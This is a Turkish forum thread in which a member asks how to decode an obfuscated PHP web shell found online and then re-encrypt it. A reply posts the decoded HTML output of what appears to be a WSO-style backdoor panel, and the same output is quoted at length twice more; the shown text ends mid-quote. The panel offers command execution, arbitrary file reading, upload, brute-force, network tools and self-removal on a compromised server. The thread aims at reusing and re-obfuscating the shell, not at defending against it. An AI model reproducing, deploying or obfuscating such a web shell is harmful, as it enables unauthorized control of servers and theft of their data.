Shell Decode

Muzcuk237529

Muzcuk237529

Yeni üye
16 Ocak 2023
10
1
Bir Shell buldum ama nasıl decode yapıcam base64 değil galiba şu şekilde başlıyor eval(rawurldecode('
Bunu nasıl decode yaparım ve tekrar şifrelerim
 
Tarihe göre sırala Oylara göre sırala
user.thestorm

user.thestorm

Katılımcı Üye
6 May 2023
412
182
Oyla 0 Downvote
Ertugrul'

Ertugrul'

Basın&Medya Ekibi Deneyimli
22 Mar 2023
1,203
974
Photoshop 🔥
Muzcuk237529' Alıntı:
shell dosyam bu internet üzerinde bulduğum için kaynak kodlarına bakmak istiyorum ama nasıl decode yapıcam

İndir shell20211028

Dosyayı indir shell20211028
dosya.co
Genişletmek için tıkla ...
Pek bilgim yok ama internette bununla ilgili kesin bir sonuc bulabilirsin bence aatma seklin dogru olursa bulabilirsin he bide ChatGPT belki sana bir sonuç verebilir.
 
Oyla 0 Downvote
T

tamam ağa

Uzman üye
7 Haz 2023
1,533
876
Muzcuk237529' Alıntı:
PHP ile pek bilgim yok ama nasıl yapıcam kodum şu şekilde

<?PHP eval(rawurldecode('ŞİFRELİ KOD ÇOK UZUN')); ?>
Genişletmek için tıkla ...
kırdım dostum kodlar aşağıda


HTML: 
<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title></title>
<style>
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color: #df5 !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid #df5; font: 9pt Monospace,'Courier New'; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}
pre{font-family:Courier,Monospace;}
</style>
<script>
    var c_ = '/runtime/php/3zed5ph8s_3zem5e9q4/';
    var a_ = 'FilesMan'
    var charset_ = 'Windows-1251';
    var p1_ = '';
    var p2_ = '';
    var p3_ = '';
    var d = document;
    function set(a,c,p1,p2,p3,charset) {
        if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
        if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
        if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
        if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
        if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
        if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
        //if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
    }
    function g(a,c,p1,p2,p3,charset) {
        set(a,c,p1,p2,p3,charset);
        d.mf.submit();
    }
    function a(a,c,p1,p2,p3,charset) {
        set(a,c,p1,p2,p3,charset);
        var params = 'ajax=true';
        for(i=0;i<d.mf.elements.length;i++)
            params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
        sr('', params);
    }
    function sr(url, params) {
        if (window.XMLHttpRequest)
            req = new XMLHttpRequest();
        else if (window.ActiveXObject)
            req = new ActiveXObject('Microsoft.XMLHTTP');
        if (req) {
            req.onreadystatechange = processReqChange;
            req.open('POST', url, true);
            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
            req.send(params);
        }
    }
    function processReqChange() {
        if( (req.readyState == 4) )
            if(req.status == 200) {
                var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm');
                var arr=reg.exec(req.responseText);
                eval(arr[2].substr(0, arr[1]));
            } else alert('Request error!');
    }
</script>
<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux 450aa482c05b 4.14.305-227.531.amzn2.x86_64 #1 SMP Tue Feb 14 09:55:28 UTC 2023 x86_64</nobr><br>2345 ( coderunner ) <span>Group:</span>  (  )<br>7.4.3 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2023-07-15 16:19:25<br>39.99 GB <span>Free:</span> 23.79 GB (59%)<br><a href='#' onclick='g("FilesMan","/")'>/</a><a href='#' onclick='g("FilesMan","/runtime/")'>runtime/</a><a href='#' onclick='g("FilesMan","/runtime/php/")'>php/</a><a href='#' onclick='g("FilesMan","/runtime/php/3zed5ph8s_3zem5e9q4/")'>3zed5ph8s_3zem5e9q4/</a> <font color=white>drwxr-xr-x</font> <a href=# onclick="g('FilesMan','/runtime/php/3zed5ph8s_3zem5e9q4','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" selected>Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script><script>
    function sa() {
        for(i=0;i<d.files.elements.length;i++)
            if(d.files.elements[i].type == 'checkbox')
                d.files.elements[i].checked = d.files.elements[0].checked;
    }
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_0")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_0")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_0")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_0")'>Permissions</a></th><th>Actions</th></tr><tr><td><input type=checkbox name="f[]" value="." class=chkbx></td><td><a href=# onclick="g('FilesMan','/runtime/php/3zed5ph8s_3zem5e9q4/.');" ><b>[ . ]</b></a></td><td>dir</td><td>2023-07-15 16:19:25</td><td>root/root</td><td><a href=# onclick="g('FilesTools',null,'.','chmod')"><font color=white>drwxr-xr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'.', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'.', 'touch')">T</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value=".." class=chkbx></td><td><a href=# onclick="g('FilesMan','/runtime/php/3zed5ph8s_3zem5e9q4/..');" ><b>[ .. ]</b></a></td><td>dir</td><td>2023-07-15 16:19:25</td><td>root/root</td><td><a href=# onclick="g('FilesTools',null,'..','chmod')"><font color=white>drwxr-xr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'..', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'..', 'touch')">T</a></td></tr><tr><td><input type=checkbox name="f[]" value="HelloWorld.php" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'HelloWorld.php', 'view')">HelloWorld.php</a></td><td>36.39 KB</td><td>2023-07-15 16:19:25</td><td>root/root</td><td><a href=# onclick="g('FilesTools',null,'HelloWorld.php','chmod')"><font color=white>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'HelloWorld.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'HelloWorld.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'HelloWorld.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'HelloWorld.php', 'download')">D</a></td></tr><tr><td colspan=7>
    <input type=hidden name=a value='FilesMan'>
    <input type=hidden name=c value='/runtime/php/3zed5ph8s_3zem5e9q4/'>
    <input type=hidden name=charset value='Windows-1251'>
    <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><option value='tar'>Compress (tar.gz)</option></select>&nbsp;<input type='submit' value='>>'></td></tr></form></table></div>
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'>
    <tr>
        <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/runtime/php/3zed5ph8s_3zem5e9q4/'><input type=submit value='>>'></form></td>
        <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
    </tr><tr>
        <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
        <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
    </tr><tr>
        <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
        <td><form method='post' ENCTYPE='multipart/form-data'>
        <input type=hidden name=a value='FilesMAn'>
        <input type=hidden name=c value='/runtime/php/3zed5ph8s_3zem5e9q4/'>
        <input type=hidden name=p1 value='uploadFile'>
        <input type=hidden name=charset value='Windows-1251'>
        <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br  ></td>
    </tr></table></div></body></html>

tamam ağa' Alıntı:
kırdım dostum kodlar aşağıda


HTML: 
<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title></title>
<style>
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color: #df5 !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid #df5; font: 9pt Monospace,'Courier New'; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}
pre{font-family:Courier,Monospace;}
</style>
<script>
    var c_ = '/runtime/php/3zed5ph8s_3zem5e9q4/';
    var a_ = 'FilesMan'
    var charset_ = 'Windows-1251';
    var p1_ = '';
    var p2_ = '';
    var p3_ = '';
    var d = document;
    function set(a,c,p1,p2,p3,charset) {
        if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
        if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
        if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
        if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
        if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
        if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
        //if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
    }
    function g(a,c,p1,p2,p3,charset) {
        set(a,c,p1,p2,p3,charset);
        d.mf.submit();
    }
    function a(a,c,p1,p2,p3,charset) {
        set(a,c,p1,p2,p3,charset);
        var params = 'ajax=true';
        for(i=0;i<d.mf.elements.length;i++)
            params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
        sr('', params);
    }
    function sr(url, params) {
        if (window.XMLHttpRequest)
            req = new XMLHttpRequest();
        else if (window.ActiveXObject)
            req = new ActiveXObject('Microsoft.XMLHTTP');
        if (req) {
            req.onreadystatechange = processReqChange;
            req.open('POST', url, true);
            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
            req.send(params);
        }
    }
    function processReqChange() {
        if( (req.readyState == 4) )
            if(req.status == 200) {
                var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm');
                var arr=reg.exec(req.responseText);
                eval(arr[2].substr(0, arr[1]));
            } else alert('Request error!');
    }
</script>
<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux 450aa482c05b 4.14.305-227.531.amzn2.x86_64 #1 SMP Tue Feb 14 09:55:28 UTC 2023 x86_64</nobr><br>2345 ( coderunner ) <span>Group:</span>  (  )<br>7.4.3 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2023-07-15 16:19:25<br>39.99 GB <span>Free:</span> 23.79 GB (59%)<br><a href='#' onclick='g("FilesMan","/")'>/</a><a href='#' onclick='g("FilesMan","/runtime/")'>runtime/</a><a href='#' onclick='g("FilesMan","/runtime/php/")'>php/</a><a href='#' onclick='g("FilesMan","/runtime/php/3zed5ph8s_3zem5e9q4/")'>3zed5ph8s_3zem5e9q4/</a> <font color=white>drwxr-xr-x</font> <a href=# onclick="g('FilesMan','/runtime/php/3zed5ph8s_3zem5e9q4','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" selected>Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script><script>
    function sa() {
        for(i=0;i<d.files.elements.length;i++)
            if(d.files.elements[i].type == 'checkbox')
                d.files.elements[i].checked = d.files.elements[0].checked;
    }
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_0")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_0")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_0")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_0")'>Permissions</a></th><th>Actions</th></tr><tr><td><input type=checkbox name="f[]" value="." class=chkbx></td><td><a href=# onclick="g('FilesMan','/runtime/php/3zed5ph8s_3zem5e9q4/.');" ><b>[ . ]</b></a></td><td>dir</td><td>2023-07-15 16:19:25</td><td>root/root</td><td><a href=# onclick="g('FilesTools',null,'.','chmod')"><font color=white>drwxr-xr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'.', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'.', 'touch')">T</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value=".." class=chkbx></td><td><a href=# onclick="g('FilesMan','/runtime/php/3zed5ph8s_3zem5e9q4/..');" ><b>[ .. ]</b></a></td><td>dir</td><td>2023-07-15 16:19:25</td><td>root/root</td><td><a href=# onclick="g('FilesTools',null,'..','chmod')"><font color=white>drwxr-xr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'..', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'..', 'touch')">T</a></td></tr><tr><td><input type=checkbox name="f[]" value="HelloWorld.php" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'HelloWorld.php', 'view')">HelloWorld.php</a></td><td>36.39 KB</td><td>2023-07-15 16:19:25</td><td>root/root</td><td><a href=# onclick="g('FilesTools',null,'HelloWorld.php','chmod')"><font color=white>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'HelloWorld.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'HelloWorld.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'HelloWorld.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'HelloWorld.php', 'download')">D</a></td></tr><tr><td colspan=7>
    <input type=hidden name=a value='FilesMan'>
    <input type=hidden name=c value='/runtime/php/3zed5ph8s_3zem5e9q4/'>
    <input type=hidden name=charset value='Windows-1251'>
    <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><option value='tar'>Compress (tar.gz)</option></select>&nbsp;<input type='submit' value='>>'></td></tr></form></table></div>
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'>
    <tr>
        <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/runtime/php/3zed5ph8s_3zem5e9q4/'><input type=submit value='>>'></form></td>
        <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
    </tr><tr>
        <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
        <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
    </tr><tr>
        <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
        <td><form method='post' ENCTYPE='multipart/form-data'>
        <input type=hidden name=a value='FilesMAn'>
        <input type=hidden name=c value='/runtime/php/3zed5ph8s_3zem5e9q4/'>
        <input type=hidden name=p1 value='uploadFile'>
        <input type=hidden name=charset value='Windows-1251'>
        <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br  ></td>
    </tr></table></div></body></html>
Genişletmek için tıkla ...
bu arada bu tam kırılmış hali değilmiş yeni fark ettim :D

bir dosya çıkartıyor tempe yarın daha detaylı analiz ederim.
 
Oyla 0 Downvote
Muzcuk237529

Muzcuk237529

Yeni üye
16 Ocak 2023
10
1
tamam ağa' Alıntı:
kırdım dostum kodlar aşağıda


HTML: 
<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title></title>
<style>
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color: #df5 !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid #df5; font: 9pt Monospace,'Courier New'; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}
pre{font-family:Courier,Monospace;}
</style>
<script>
    var c_ = '/runtime/php/3zed5ph8s_3zem5e9q4/';
    var a_ = 'FilesMan'
    var charset_ = 'Windows-1251';
    var p1_ = '';
    var p2_ = '';
    var p3_ = '';
    var d = document;
    function set(a,c,p1,p2,p3,charset) {
        if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
        if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
        if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
        if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
        if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
        if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
        //if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
    }
    function g(a,c,p1,p2,p3,charset) {
        set(a,c,p1,p2,p3,charset);
        d.mf.submit();
    }
    function a(a,c,p1,p2,p3,charset) {
        set(a,c,p1,p2,p3,charset);
        var params = 'ajax=true';
        for(i=0;i<d.mf.elements.length;i++)
            params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
        sr('', params);
    }
    function sr(url, params) {
        if (window.XMLHttpRequest)
            req = new XMLHttpRequest();
        else if (window.ActiveXObject)
            req = new ActiveXObject('Microsoft.XMLHTTP');
        if (req) {
            req.onreadystatechange = processReqChange;
            req.open('POST', url, true);
            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
            req.send(params);
        }
    }
    function processReqChange() {
        if( (req.readyState == 4) )
            if(req.status == 200) {
                var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm');
                var arr=reg.exec(req.responseText);
                eval(arr[2].substr(0, arr[1]));
            } else alert('Request error!');
    }
</script>
<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux 450aa482c05b 4.14.305-227.531.amzn2.x86_64 #1 SMP Tue Feb 14 09:55:28 UTC 2023 x86_64</nobr><br>2345 ( coderunner ) <span>Group:</span>  (  )<br>7.4.3 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2023-07-15 16:19:25<br>39.99 GB <span>Free:</span> 23.79 GB (59%)<br><a href='#' onclick='g("FilesMan","/")'>/</a><a href='#' onclick='g("FilesMan","/runtime/")'>runtime/</a><a href='#' onclick='g("FilesMan","/runtime/php/")'>php/</a><a href='#' onclick='g("FilesMan","/runtime/php/3zed5ph8s_3zem5e9q4/")'>3zed5ph8s_3zem5e9q4/</a> <font color=white>drwxr-xr-x</font> <a href=# onclick="g('FilesMan','/runtime/php/3zed5ph8s_3zem5e9q4','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" selected>Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script><script>
    function sa() {
        for(i=0;i<d.files.elements.length;i++)
            if(d.files.elements[i].type == 'checkbox')
                d.files.elements[i].checked = d.files.elements[0].checked;
    }
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_0")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_0")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_0")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_0")'>Permissions</a></th><th>Actions</th></tr><tr><td><input type=checkbox name="f[]" value="." class=chkbx></td><td><a href=# onclick="g('FilesMan','/runtime/php/3zed5ph8s_3zem5e9q4/.');" ><b>[ . ]</b></a></td><td>dir</td><td>2023-07-15 16:19:25</td><td>root/root</td><td><a href=# onclick="g('FilesTools',null,'.','chmod')"><font color=white>drwxr-xr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'.', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'.', 'touch')">T</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value=".." class=chkbx></td><td><a href=# onclick="g('FilesMan','/runtime/php/3zed5ph8s_3zem5e9q4/..');" ><b>[ .. ]</b></a></td><td>dir</td><td>2023-07-15 16:19:25</td><td>root/root</td><td><a href=# onclick="g('FilesTools',null,'..','chmod')"><font color=white>drwxr-xr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'..', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'..', 'touch')">T</a></td></tr><tr><td><input type=checkbox name="f[]" value="HelloWorld.php" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'HelloWorld.php', 'view')">HelloWorld.php</a></td><td>36.39 KB</td><td>2023-07-15 16:19:25</td><td>root/root</td><td><a href=# onclick="g('FilesTools',null,'HelloWorld.php','chmod')"><font color=white>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'HelloWorld.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'HelloWorld.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'HelloWorld.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'HelloWorld.php', 'download')">D</a></td></tr><tr><td colspan=7>
    <input type=hidden name=a value='FilesMan'>
    <input type=hidden name=c value='/runtime/php/3zed5ph8s_3zem5e9q4/'>
    <input type=hidden name=charset value='Windows-1251'>
    <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><option value='tar'>Compress (tar.gz)</option></select>&nbsp;<input type='submit' value='>>'></td></tr></form></table></div>
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'>
    <tr>
        <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/runtime/php/3zed5ph8s_3zem5e9q4/'><input type=submit value='>>'></form></td>
        <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
    </tr><tr>
        <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
